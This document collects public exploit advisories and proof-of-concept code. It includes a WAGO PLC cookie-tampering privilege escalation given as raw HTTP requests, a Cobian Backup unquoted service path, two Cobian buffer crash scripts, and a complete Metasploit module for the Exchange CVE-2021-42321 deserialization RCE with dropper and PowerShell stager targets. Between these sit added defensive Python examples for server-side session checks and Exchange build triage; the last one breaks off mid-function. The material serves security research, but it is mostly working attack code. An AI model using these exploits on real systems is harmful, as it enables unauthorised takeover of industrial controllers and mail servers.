<pre><code># Exploit Title: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation<br /># Date: 02/16/2022<br /># Exploit Author: Momen Eldawakhly (Cyber Guy) at Cypro AB<br /># Vendor Homepage: https://www.wago.com<br /># Version: Firmware version 03.05.10(17)<br /># Tested on: PopOS! [Linux](Firefox)<br /># CVE : CVE-2021-46388<br /><br />========================================<br />= The ordinary user privilege request:<br />========================================<br /><br />GET /wbm/ HTTP/1.1<br />Host: 192.168.1.1<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: close<br />Referer: http://192.168.1.1/wbm/<br />Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22user%22%2C%22roles%22:[%22user%22%2C%22guest%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642368720673%2C%22sessionExists%22:true}<br /><br />==========================================<br />= Manipulated Cookie to Admin Privilege:<br />==========================================<br /><br />GET /wbm/ HTTP/1.1<br />Host: 192.168.1.1<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: close<br />Referer: http://192.168.1.1/wbm/<br />Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22admin%22%2C%22roles%22:[%22admin%22%2C%22admin%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642369499829%2C%22sessionExists%22:true}<br /><br /></code></pre>
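The WAGO requests above differ only in the `user` cookie: the client rewrites `name` and `roles` inside a JSON blob it controls, and the application honours it. The defect is that authorisation data lives in a client-writable cookie at all. The following is an added example, not WAGO's code, of how a server should resolve the same two requests: roles come from a server-side session record keyed by `NG_WBM_SESSION`, the `user` cookie is parsed only as a claim, and a mismatch between claim and record is surfaced as a tampering signal. The session store and the assumption that `NG_WBM_SESSION` identifies the session are constructed for this example; the two Cookie headers are the ones from the advisory.

```python
import json
from typing import Dict, Optional
from urllib.parse import unquote

# Constructed server-side session store: the only place roles are authoritative.
# The session id matches the advisory's request so its cookies can be replayed here.
SESSIONS: Dict[str, Dict[str, object]] = {
    "qru3ocrpde79m5f73526i65uv5": {"name": "user", "roles": ["user", "guest"]},
}


def parse_cookies(header: str) -> Dict[str, str]:
    """Minimal Cookie header parser: split on ';', then on the first '='."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            cookies[key] = value
    return cookies


def claimed_identity(cookies: Dict[str, str]) -> Optional[dict]:
    """Decode the client-supplied 'user' cookie (percent-encoded JSON). A claim, never truth."""
    raw = cookies.get("user")
    if raw is None:
        return None
    try:
        return json.loads(unquote(raw))
    except json.JSONDecodeError:
        return None


def authorize(cookie_header: str) -> Optional[dict]:
    """Resolve the effective identity from the server-side session and flag cookies whose
    claimed name/roles disagree with it (the manipulation the advisory demonstrates)."""
    cookies = parse_cookies(cookie_header)
    session = SESSIONS.get(cookies.get("NG_WBM_SESSION", ""))
    if session is None:
        return None                       # unknown session: unauthenticated
    claim = claimed_identity(cookies) or {}
    tampered = claim.get("name") != session["name"] or claim.get("roles") != session["roles"]
    return {"name": session["name"], "roles": list(session["roles"]), "tampered": tampered}


def is_admin(cookie_header: str) -> bool:
    """Admin access is decided from the server-side roles only."""
    identity = authorize(cookie_header)
    return bool(identity) and "admin" in identity["roles"]


# The two Cookie headers from the advisory: the original and the manipulated one.
USER_COOKIE = (
    "NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22user%22%2C%22roles%22:"
    "[%22user%22%2C%22guest%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:"
    "%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642368720673"
    "%2C%22sessionExists%22:true}"
)
ADMIN_COOKIE = USER_COOKIE.replace("%22name%22:%22user%22", "%22name%22:%22admin%22").replace(
    "[%22user%22%2C%22guest%22]", "[%22admin%22%2C%22admin%22]"
)

if __name__ == "__main__":
    for label, header in (("original", USER_COOKIE), ("manipulated", ADMIN_COOKIE)):
        print(label, authorize(header), "admin access:", is_admin(header))
```

The `tampered` flag is worth logging with the session id and source address: a client presenting claims that contradict its own session is a strong signal of deliberate manipulation rather than a stale cookie.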
<pre><code># Exploit Title: Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-24<br /># Vendor Homepage: https://www.cobiansoft.com/<br /># Software Link : https://files.cobiansoft.com/programs/cbSetup.exe<br /># Tested Version: 11.2.0.582<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Step to discover Unquoted Service Path: <br /><br />C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Gravity " | findstr /i /v """<br /><br /><br />Cobian Backup 11 Gravity CobianBackup11 C:\Program Files (x86)\Cobian Backup 11\cbService.exe Auto<br /><br /><br /># Service info:<br /><br />C:\>sc qc CobianBackup11<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: CobianBackup11<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Cobian Backup 11\cbService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Cobian Backup 11 Gravity<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /></code></pre>
<pre><code># Exploit Title: Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-16<br /># Vendor Homepage: https://www.cobiansoft.com/<br /># Software Link: https://files.cobiansoft.com/programs/cbSetup.exe<br /># Tested Version: 11.2.0.582<br /># Vulnerability Type: Denial of Service (DoS) Local<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Steps to Produce the Crash:<br /># 1.- Run python code: Cobian_Backup_11.2.0.582.py<br /># 2.- Open Cobian_Backup_11.2.0.582.txt and copy content to clipboard<br /># 3.- Open "Cobian Backup 11 Gravity User Interface"<br /># 4.- Task -> "New task"<br /># 5.- File -> Source "Add" -> FTP<br /># 6.- Host -> 10.10.10.10<br /># 7.- Port-> 21<br /># 8.- User name -> admin<br /># 9.- Paste ClipBoard on "Password"<br /># 10.- Ok<br /># 11.- Crashed<br /><br />#!/usr/bin/env python<br /><br />buffer = "\x41" * 800<br />f = open ("Cobian_Backup_11.2.0.582.txt", "w")<br />f.write(buffer)<br />f.close()<br /> <br /></code></pre>
<pre><code># Exploit Title: Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-16<br /># Vendor Homepage: https://www.cobiansoft.com/<br /># Software Link: https://files.cobiansoft.com/programs/crSetup-0.9.93-RC1.exe<br /># Tested Version: 0.9.93 RC1<br /># Vulnerability Type: Denial of Service (DoS) Local<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Steps to Produce the Crash:<br /># 1.- Run python code: Cobian_Reflector_0.9.93_RC1.py<br /># 2.- Open Cobian_Reflector_0.9.93_RC1.txt and copy content to clipboard<br /># 3.- Open "Cobian Reflector User Interface"<br /># 4.- Task -> "New task"<br /># 5.- Files -> Source "Add" -> SFTP<br /># 6.- Host -> 10.10.10.10<br /># 7.- Port-> 22<br /># 8.- User name -> admin<br /># 9.- Paste ClipBoard on "Password"<br /># 10.- Test settings<br /># 11.- Yes<br /># 12.- Crashed<br /><br />#!/usr/bin/env python<br /><br />buffer = "\x41" * 8000<br />f = open ("Cobian_Reflector_0.9.93_RC1.txt", "w")<br />f.write(buffer)<br />f.close()<br /> <br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'nokogiri'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Powershell<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE',<br /> 'Description' => %q{<br /> This vulnerability allows remote attackers to execute arbitrary code<br /> on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11<br /> prior to Security Update 2, Exchange Server 2016 CU21 prior to<br /> Security Update 3, and Exchange Server 2016 CU22 prior to<br /> Security Update 2.<br /><br /> Note that authentication is required to exploit this vulnerability.<br /><br /> The specific flaw exists due to the fact that the deny list for the<br /> ChainedSerializationBinder had a typo whereby an entry was typo'd as<br /> System.Security.ClaimsPrincipal instead of the proper value of<br /> System.Security.Claims.ClaimsPrincipal.<br /><br /> By leveraging this vulnerability, attackers can bypass the<br /> ChainedSerializationBinder's deserialization deny list<br /> and execute code as NT AUTHORITY\SYSTEM.<br /><br /> Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019,<br /> and Exchange Server 2016 CU22 SU0 on Windows Server 2016.<br /> },<br /> 'Author' => [<br /> 'pwnforsp', # Original Bug Discovery<br /> 'zcgonvh', # Of 360 noah lab, Original Bug Discovery<br /> 'Microsoft Threat Intelligence Center', # Discovery of exploitation in the wild<br /> 'Microsoft Security Response Center', # Discovery of exploitation in the wild<br /> 'peterjson', # Writeup<br /> 
'testanull', # PoC Exploit<br /> 'Grant Willcox', # Aka tekwizz123. That guy in the back who took the hard work of all the people above and wrote this module :D<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-42321'],<br /> ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321'],<br /> ['URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7'],<br /> ['URL', 'https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169'],<br /> ['URL', 'https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398'],<br /> ['URL', 'https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852']<br /> ],<br /> 'DisclosureDate' => '2021-12-09',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Windows Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_cmd<br /> }<br /> ],<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :win_dropper,<br /> 'DefaultOptions' => {<br /> 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest<br /> }<br /> }<br /> ],<br /> [<br /> 'PowerShell Stager',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :psh_stager<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'HttpClientTimeout' => 5,<br /> 'WfsDelay' => 10<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS, # Can easily log using advice at https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169<br /> 
CONFIG_CHANGES # Alters the user configuration on the Inbox folder to get the payload to trigger.<br /> ]<br /> }<br /> )<br /> )<br /> register_options([<br /> Opt::RPORT(443),<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('HttpUsername', [true, 'The username to log into the Exchange server as', '']),<br /> OptString.new('HttpPassword', [true, 'The password to use to authenticate to the Exchange server', ''])<br /> ])<br /> end<br /><br /> def post_auth?<br /> true<br /> end<br /><br /> def username<br /> datastore['HttpUsername']<br /> end<br /><br /> def password<br /> datastore['HttpPassword']<br /> end<br /><br /> def vuln_builds<br /> # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019<br /> [<br /> [Rex::Version.new('15.1.2308.8'), Rex::Version.new('15.1.2308.20')], # Exchange Server 2016 CU21<br /> [Rex::Version.new('15.1.2375.7'), Rex::Version.new('15.1.2375.17')], # Exchange Server 2016 CU22<br /> [Rex::Version.new('15.2.922.7'), Rex::Version.new('15.2.922.19')], # Exchange Server 2019 CU10<br /> [Rex::Version.new('15.2.986.5'), Rex::Version.new('15.2.986.14')] # Exchange Server 2019 CU11<br /> ]<br /> end<br /><br /> def check<br /> # First lets try a cheap way of doing this via a leak of the X-OWA-Version header.<br /> # If we get this we know the version number for sure and we can skip a lot of leg work.<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/owa/service')<br /> )<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check.')<br /> end<br /><br /> if res.headers['X-OWA-Version']<br /> build = res.headers['X-OWA-Version']<br /> if vuln_builds.any? 
{ |build_range| Rex::Version.new(build).between?(*build_range) }<br /> return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")<br /> else<br /> return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")<br /> end<br /> end<br /><br /> # Next, determine if we are up against an older version of Exchange Server where<br /> # the /owa/auth/logon.aspx page gives the full version. Recent versions of Exchange<br /> # give only a partial version without the build number.<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/owa/auth/logon.aspx')<br /> )<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check.')<br /> end<br /><br /> if res.code == 200 && ((%r{/owa/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body) || (%r{/owa/auth/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body))<br /> if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }<br /> return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")<br /> else<br /> return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")<br /> end<br /> end<br /><br /> # Next, try @tseller's way: request /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application,<br /> # which if successful should provide some XML with entries like the following:<br /> #<br /> # <assemblyIdentity name="microsoft.exchange.ediscovery.exporttool.application"<br /> # version="15.2.986.5" publicKeyToken="b1d1a6c45aa418ce" language="neutral"<br /> # processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" /><br /> #<br /> # This only works on Exchange Server 2013 and later and may not always work, but if it<br /> # does work it provides the full version number, so it's a nice strategy.<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 
'/ecp/current/exporttool/microsoft.exchange.ediscovery.exporttool.application')<br /> )<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check.')<br /> end<br /><br /> if res.code == 200 && res.body =~ /name="microsoft.exchange.ediscovery.exporttool" version="\d+\.\d+\.\d+\.\d+"/<br /> build = res.body.match(/name="microsoft.exchange.ediscovery.exporttool" version="(\d+\.\d+\.\d+\.\d+)"/)[1]<br /> if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }<br /> return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")<br /> else<br /> return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")<br /> end<br /> end<br /><br /> # Finally, try a variation on the above and use a well known trick of grabbing /owa/auth/logon.aspx<br /> # to get a partial version number, then use the URL at /ecp/<version here>/exporttool/. If we get a 200<br /> # OK response, we found the target version number, otherwise we didn't find it.<br /> #<br /> # Props go to @jmartin-r7 for improving my original code for this and suggesting the use of<br /> # canonical_segments to make this close to the Rex::Version code format. Also for noticing that<br /> # version_range is a Rex::Version object already and cleaning up some of my original code to simplify<br /> # things on this premise.<br /><br /> vuln_builds.each do |version_range|<br /> return CheckCode::Unknown('Range provided is not iterable') unless version_range[0].canonical_segments[0..-2] == version_range[1].canonical_segments[0..-2]<br /><br /> prepend_range = version_range[0].canonical_segments[0..-2]<br /> lowest_patch = version_range[0].canonical_segments.last<br /> while Rex::Version.new((prepend_range.dup << lowest_patch).join('.')) <= version_range[1]<br /> # Candidate build for this iteration; the request below interpolates it.<br /> build = (prepend_range.dup << lowest_patch).join('.')<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, "/ecp/#{build}/exporttool/")<br /> )<br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check.')<br /> end<br /> if res.code == 200<br /> return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")<br /> end<br /><br /> lowest_patch += 1<br /> end<br /> end<br /><br /> # Only reached once every candidate build in every range has been tried.<br /> CheckCode::Unknown('Could not determine the build number of the target Exchange Server.')<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :win_cmd<br /> execute_command(payload.encoded)<br /> when :win_dropper<br /> execute_cmdstager<br /> when :psh_stager<br /> execute_command(cmd_psh_payload(<br /> payload.encoded,<br /> payload.arch.first,<br /> remove_comspec: true<br /> ))<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # Get the user's inbox folder's ID and change key ID.<br /> print_status("Getting the user's inbox folder's ID and ChangeKey ID...")<br /> xml_getfolder_inbox = %(<?xml version="1.0" encoding="utf-8"?><br /> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><br /> <soap:Header><br /> 
<t:RequestServerVersion Version="Exchange2013" /><br /> </soap:Header><br /> <soap:Body><br /> <m:GetFolder><br /> <m:FolderShape><br /> <t:BaseShape>AllProperties</t:BaseShape><br /> </m:FolderShape><br /> <m:FolderIds><br /> <t:DistinguishedFolderId Id="inbox" /><br /> </m:FolderIds><br /> </m:GetFolder><br /> </soap:Body><br /> </soap:Envelope>)<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),<br /> 'data' => xml_getfolder_inbox,<br /> 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.<br /> }<br /> )<br /> fail_with(Failure::Unreachable, 'Connection failed') if res.nil?<br /><br /> unless res&.body<br /> fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')<br /> end<br /><br /> xml_getfolder = res.get_xml_document<br /> xml_getfolder.remove_namespaces!<br /> xml_tag = xml_getfolder.xpath('//FolderId')<br /> if xml_tag.empty?<br /> fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')<br /> end<br /> unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')<br /> fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')<br /> end<br /> change_key_val = xml_tag.attribute('ChangeKey').value<br /> folder_id_val = xml_tag.attribute('Id').value<br /> print_good("ChangeKey value for Inbox folder is #{change_key_val}")<br /> print_good("ID value for Inbox folder is #{folder_id_val}")<br /><br /> # Delete the user configuration object that is currently on the Inbox folder.<br /> print_status('Deleting the user configuration object associated with the Inbox folder...')<br /> xml_delete_inbox_user_config = %(<?xml version="1.0" encoding="utf-8"?><br /> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><br /> <soap:Header><br /> <t:RequestServerVersion Version="Exchange2013" /><br /> </soap:Header><br /> <soap:Body><br /> <m:DeleteUserConfiguration><br /> <m:UserConfigurationName Name="ExtensionMasterTable"><br /> <t:FolderId Id="#{folder_id_val}" ChangeKey="#{change_key_val}" /><br /> </m:UserConfigurationName><br /> </m:DeleteUserConfiguration><br /> </soap:Body><br /> </soap:Envelope>)<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),<br /> 'data' => xml_delete_inbox_user_config,<br /> 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.<br /> }<br /> )<br /> fail_with(Failure::Unreachable, 'Connection failed') if res.nil?<br /><br /> unless res&.body<br /> fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')<br /> end<br /><br /> if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}<br /> print_good('Successfully deleted the user configuration object associated with the Inbox folder!')<br /> else<br /> print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')<br /> print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')<br /> end<br /><br /> # Now to replace the deleted user configuration object with our own user configuration object.<br /> print_status('Creating the malicious user configuration object on the Inbox folder!')<br /><br /> gadget_chain = 
Rex::Text.encode_base64(Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: :ClaimsPrincipal, formatter: :BinaryFormatter))<br /> xml_malicious_user_config = %(<?xml version="1.0" encoding="utf-8"?><br /> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><br /> <soap:Header><br /> <t:RequestServerVersion Version="Exchange2013" /><br /> </soap:Header><br /> <soap:Body><br /> <m:CreateUserConfiguration><br /> <m:UserConfiguration><br /> <t:UserConfigurationName Name="ExtensionMasterTable"><br /> <t:FolderId Id="#{folder_id_val}" ChangeKey="#{change_key_val}" /><br /> </t:UserConfigurationName><br /> <t:Dictionary><br /> <t:DictionaryEntry><br /> <t:DictionaryKey><br /> <t:Type>String</t:Type><br /> <t:Value>OrgChkTm</t:Value><br /> </t:DictionaryKey><br /> <t:DictionaryValue><br /> <t:Type>Integer64</t:Type><br /> <t:Value>#{rand(1000000000000000000..9111999999999999999)}</t:Value><br /> </t:DictionaryValue><br /> </t:DictionaryEntry><br /> <t:DictionaryEntry><br /> <t:DictionaryKey><br /> <t:Type>String</t:Type><br /> <t:Value>OrgDO</t:Value><br /> </t:DictionaryKey><br /> <t:DictionaryValue><br /> <t:Type>Boolean</t:Type><br /> <t:Value>false</t:Value><br /> </t:DictionaryValue><br /> </t:DictionaryEntry><br /> </t:Dictionary><br /> <t:BinaryData>#{gadget_chain}</t:BinaryData><br /> </m:UserConfiguration><br /> </m:CreateUserConfiguration><br /> </soap:Body><br /> </soap:Envelope>)<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),<br /> 'data' => xml_malicious_user_config,<br /> 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.<br /> }<br /> 
)<br /> fail_with(Failure::Unreachable, 'Connection failed') if res.nil?<br /><br /> unless res&.body<br /> fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')<br /> end<br /><br /> unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}<br /> fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')<br /> end<br /><br /> print_good('Successfully created the malicious user configuration object and associated it with the Inbox folder!')<br /><br /> # Deserialize our object. If all goes well, you should now have SYSTEM :)<br /> print_status('Attempting to deserialize the user configuration object using a GetClientAccessToken request...')<br /> xml_get_client_access_token = %(<?xml version="1.0" encoding="utf-8"?><br /> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><br /> <soap:Header><br /> <t:RequestServerVersion Version="Exchange2013" /><br /> </soap:Header><br /> <soap:Body><br /> <m:GetClientAccessToken><br /> <m:TokenRequests><br /> <t:TokenRequest><br /> <t:Id>#{Rex::Text.rand_text_alphanumeric(4..50)}</t:Id><br /> <t:TokenType>CallerIdentity</t:TokenType><br /> </t:TokenRequest><br /> </m:TokenRequests><br /> </m:GetClientAccessToken><br /> </soap:Body><br /> </soap:Envelope>)<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),<br /> 'data' => xml_get_client_access_token,<br /> 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.<br /> }<br /> )<br /> fail_with(Failure::Unreachable, 'Connection failed') if res.nil?<br /><br /> unless res&.body<br /> fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')<br /> end<br /><br /> unless res.body =~ %r{<e:Message xmlns:e="http://schemas.microsoft.com/exchange/services/2006/errors">An internal server error occurred. The operation failed.</e:Message>}<br /> fail_with(Failure::UnexpectedReply, 'Did not receive the expected internal server error upon deserialization!')<br /> end<br /> end<br />end<br /></code></pre>
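The module's check method reads the Exchange build from three places (the X-OWA-Version header, versioned resource paths on /owa/auth/logon.aspx, and the export tool manifest) and compares it against the vuln_builds ranges. The following is an added example, not part of the Metasploit module or of Metasploit itself: a defender-side triage helper in Python that does the same range check on a build number an administrator already has (a captured response header, a saved logon page, a manifest pulled from their own server), and that reports "unknown" for the partial versions newer logon pages expose rather than guessing. The sample header, page fragment and manifest snippet are constructed; the manifest regex accepting both the plain and the `.application` assembly name is an assumption, not something the page states.

```python
"""Triage an Exchange build number against the CVE-2021-42321 build ranges.

Added example (not the Metasploit module's code). The three extractors mirror
the sources the module's check method describes; VULN_BUILDS is transcribed
from its vuln_builds method.
"""
import re
from typing import Dict, Optional, Tuple

Build = Tuple[int, ...]

# Inclusive vulnerable ranges, transcribed from the module's vuln_builds.
VULN_BUILDS = [
    ((15, 1, 2308, 8), (15, 1, 2308, 20)),   # Exchange Server 2016 CU21
    ((15, 1, 2375, 7), (15, 1, 2375, 17)),   # Exchange Server 2016 CU22
    ((15, 2, 922, 7), (15, 2, 922, 19)),     # Exchange Server 2019 CU10
    ((15, 2, 986, 5), (15, 2, 986, 14)),     # Exchange Server 2019 CU11
]

FULL_BUILD = r"\d+\.\d+\.\d+\.\d+"


def parse_build(text: str) -> Optional[Build]:
    """Int tuple for a full four-segment build; None for a partial one such as
    the '15.2' newer logon pages expose, which cannot be range-checked."""
    text = text.strip()
    if not re.fullmatch(FULL_BUILD, text):
        return None
    return tuple(int(seg) for seg in text.split("."))


def build_from_owa_header(headers: Dict[str, str]) -> Optional[str]:
    """Source 1: the X-OWA-Version response header (header names are case-insensitive)."""
    for name, value in headers.items():
        if name.lower() == "x-owa-version":
            return value.strip()
    return None


def build_from_logon_page(html: str) -> Optional[str]:
    """Source 2: versioned resource paths (/owa/<build>/ or /owa/auth/<build>/)."""
    match = re.search(r"/owa/(?:auth/)?(" + FULL_BUILD + r")/", html)
    return match.group(1) if match else None


def build_from_exporttool_manifest(xml: str) -> Optional[str]:
    """Source 3: the assemblyIdentity element of the export tool manifest.
    Assumption: the name may carry the '.application' suffix or not, and the
    attributes may be split across lines as in the module's comment."""
    match = re.search(
        r'name="microsoft\.exchange\.ediscovery\.exporttool(?:\.application)?"\s+'
        r'version="(' + FULL_BUILD + r')"',
        xml,
    )
    return match.group(1) if match else None


def classify(build_text: Optional[str]) -> str:
    """'vulnerable', 'not vulnerable', or 'unknown' when no full build is known."""
    if build_text is None:
        return "unknown"
    build = parse_build(build_text)
    if build is None:
        return "unknown"
    if any(low <= build <= high for low, high in VULN_BUILDS):
        return "vulnerable"
    return "not vulnerable"


def triage(headers: Dict[str, str], logon_html: str, manifest_xml: str) -> Tuple[str, Optional[str], str]:
    """Try the sources in the module's order, stop at the first full build.
    Returns (source, build, verdict)."""
    candidates = [
        ("X-OWA-Version", build_from_owa_header(headers)),
        ("logon.aspx", build_from_logon_page(logon_html)),
        ("exporttool manifest", build_from_exporttool_manifest(manifest_xml)),
    ]
    for source, build in candidates:
        if build is not None and parse_build(build) is not None:
            return source, build, classify(build)
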